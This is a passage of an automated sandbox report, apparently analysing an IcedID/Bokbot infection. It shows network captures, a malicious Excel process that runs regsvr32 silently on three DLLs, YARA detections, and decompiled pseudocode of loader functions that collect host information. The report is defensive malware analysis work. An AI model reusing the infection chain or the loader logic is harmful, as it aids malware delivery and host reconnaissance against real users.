                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                              Jul 6, 2021 15:34:27.475908995 CEST966INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                              Jul 6, 2021 15:34:27.475946903 CEST966INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              HTTPS Packets

                                                                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                              Jul 6, 2021 15:34:17.194757938 CEST13.224.92.73443192.168.2.2249170CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.657012939 CEST13.224.92.73443192.168.2.2249172CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.273464918 CEST13.224.92.73443192.168.2.2249174CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                              Analysis Process: EXCEL.EXE PID: 1228 Parent PID: 584

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:33:40
                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                              Imagebase:0x13f700000
                                                                                                                                                                                                              File size:27641504 bytes
                                                                                                                                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 2808 Parent PID: 1228

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:33:43
                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                              Imagebase:0xffc80000
                                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000003.00000002.2102276983.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2102412669.0000000000347000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 2996 Parent PID: 1228

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:33:48
                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                              Imagebase:0xffc80000
                                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2109562092.0000000000190000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 3068 Parent PID: 1228

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:33:51
                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                              Imagebase:0xffc80000
                                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000006.00000002.2118500619.00000000000A0000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000006.00000002.2120636157.0000000003090000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 2808 Parent PID: 1228 regsvr32.exeCOMMON

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                Function 002227BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                                			E002227BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E00222990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x2270c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E00222990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                                0x002227bc
                                                                                                                                                                                                                0x002227bc
                                                                                                                                                                                                                0x002227bc
                                                                                                                                                                                                                0x002227bf
                                                                                                                                                                                                                0x002227c3
                                                                                                                                                                                                                0x002227c7
                                                                                                                                                                                                                0x002227cb
                                                                                                                                                                                                                0x002227d4
                                                                                                                                                                                                                0x002227d7
                                                                                                                                                                                                                0x002227e7
                                                                                                                                                                                                                0x002227ea
                                                                                                                                                                                                                0x002227fa
                                                                                                                                                                                                                0x00222800
                                                                                                                                                                                                                0x00222806
                                                                                                                                                                                                                0x0022285f
                                                                                                                                                                                                                0x0022285f
                                                                                                                                                                                                                0x00222876
                                                                                                                                                                                                                0x0022287b
                                                                                                                                                                                                                0x00222893
                                                                                                                                                                                                                0x00222893
                                                                                                                                                                                                                0x0022280f
                                                                                                                                                                                                                0x00222814
                                                                                                                                                                                                                0x0022281f
                                                                                                                                                                                                                0x0022282c
                                                                                                                                                                                                                0x0022282c
                                                                                                                                                                                                                0x0022282f
                                                                                                                                                                                                                0x00222835
                                                                                                                                                                                                                0x0022283b
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00222842
                                                                                                                                                                                                                0x00222845
                                                                                                                                                                                                                0x00222849
                                                                                                                                                                                                                0x00222894
                                                                                                                                                                                                                0x00222897
                                                                                                                                                                                                                0x0022289e
                                                                                                                                                                                                                0x002228a9
                                                                                                                                                                                                                0x002228b5
                                                                                                                                                                                                                0x002228b7
                                                                                                                                                                                                                0x002228ba
                                                                                                                                                                                                                0x002228c1
                                                                                                                                                                                                                0x002228c8
                                                                                                                                                                                                                0x002228cd
                                                                                                                                                                                                                0x002228d0
                                                                                                                                                                                                                0x002228d0
                                                                                                                                                                                                                0x002228b5
                                                                                                                                                                                                                0x002228d7
                                                                                                                                                                                                                0x002228da
                                                                                                                                                                                                                0x002228df
                                                                                                                                                                                                                0x002228e8
                                                                                                                                                                                                                0x002228ed
                                                                                                                                                                                                                0x002228f6
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x002228fc
                                                                                                                                                                                                                0x0022284b
                                                                                                                                                                                                                0x00222854
                                                                                                                                                                                                                0x00222859
                                                                                                                                                                                                                0x00222859

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00222CFE,?,?,00000003,002224A4), ref: 0022280F
                                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00222CFE,?,?,00000003,002224A4), ref: 00222845
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdaptersInfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3177971545-0
                                                                                                                                                                                                                • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                • Instruction ID: 245941d8b4e4a7046140d22d91b32c0721a9569b03acbf132dfb382186deeb5e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F318922615B91F2EB29DFA2F8087997761EB49F94F494025CE0D07718EE39C69DC310
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 00221810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                • Instruction ID: c968a704f5c69b554aba8563389135c10054705fd1714a6adc5ea6cd00be2f94
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA71C232311B92A7EB24CFA6F854B9937A1FB58B94F448125DE4A53B14DF38C5B5CB00
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 002222DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LookupAccountNameW.ADVAPI32 ref: 0022233C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AccountLookupName
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1484870144-0
                                                                                                                                                                                                                • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                • Instruction ID: 6e0d387d8371077d84c3f04d36728fa61dd1675ff3232ad3a4c665c89defe175
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA317A72711B52AAEB14AFB4F84839933A4EB48B88F584135DA4D57B28EF38C65CC740
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 00221678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(?,?,00000000,00222CB1,?,?,00000003,002224A4), ref: 002216CB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InformationQuerySystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3562636166-0
                                                                                                                                                                                                                • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                • Instruction ID: 796d0d79ccc3da84dda57b7a69507d01cb90f19ebe43e634f48fc42e5405db7f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8218625325751A3EB149FD2F808B65A2A1BFE5BC1F184034DE0A47714EF3CCAA98700
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 00222434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                                			E00222434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E002211FC(_t73 - 0x29, _t52);
					_t37 = E0022153C(_t73 - 0x29);
					E00222C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E00221EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E0022272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E00221FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E00222A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                                0x00222434
                                                                                                                                                                                                                0x00222434
                                                                                                                                                                                                                0x00222434
                                                                                                                                                                                                                0x00222434
                                                                                                                                                                                                                0x00222434
                                                                                                                                                                                                                0x00222434
                                                                                                                                                                                                                0x00222434
                                                                                                                                                                                                                0x00222439
                                                                                                                                                                                                                0x0022243f
                                                                                                                                                                                                                0x0022244d
                                                                                                                                                                                                                0x0022244d
                                                                                                                                                                                                                0x0022244d
                                                                                                                                                                                                                0x00222512
                                                                                                                                                                                                                0x00222528
                                                                                                                                                                                                                0x00222450
                                                                                                                                                                                                                0x00222454
                                                                                                                                                                                                                0x00222456
                                                                                                                                                                                                                0x0022245a
                                                                                                                                                                                                                0x00222460
                                                                                                                                                                                                                0x00222468
                                                                                                                                                                                                                0x0022246e
                                                                                                                                                                                                                0x00222472
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00222474
                                                                                                                                                                                                                0x00222482
                                                                                                                                                                                                                0x0022248c
                                                                                                                                                                                                                0x0022249d
                                                                                                                                                                                                                0x0022249f
                                                                                                                                                                                                                0x002224a4
                                                                                                                                                                                                                0x002224a7
                                                                                                                                                                                                                0x002224b0
                                                                                                                                                                                                                0x002224bf
                                                                                                                                                                                                                0x002224c1
                                                                                                                                                                                                                0x002224cc
                                                                                                                                                                                                                0x002224d2
                                                                                                                                                                                                                0x002224d7
                                                                                                                                                                                                                0x002224db
                                                                                                                                                                                                                0x002224e0
                                                                                                                                                                                                                0x002224e2
                                                                                                                                                                                                                0x002224f0
                                                                                                                                                                                                                0x002224f0
                                                                                                                                                                                                                0x002224fc
                                                                                                                                                                                                                0x00222501
                                                                                                                                                                                                                0x00222504
                                                                                                                                                                                                                0x0022250d
                                                                                                                                                                                                                0x0022250d
                                                                                                                                                                                                                0x00222504
                                                                                                                                                                                                                0x002224cc
                                                                                                                                                                                                                0x002224bf
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x002224a7

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                • Instruction ID: 0d3c4b3b9faba516df73fb83471f407100eb8448c6c4f3264ce0450d2fa87f13
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A121C132310A61FAEF14EFF1E8547DD2361E754784F884426EE0D57618EE38D669C750
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
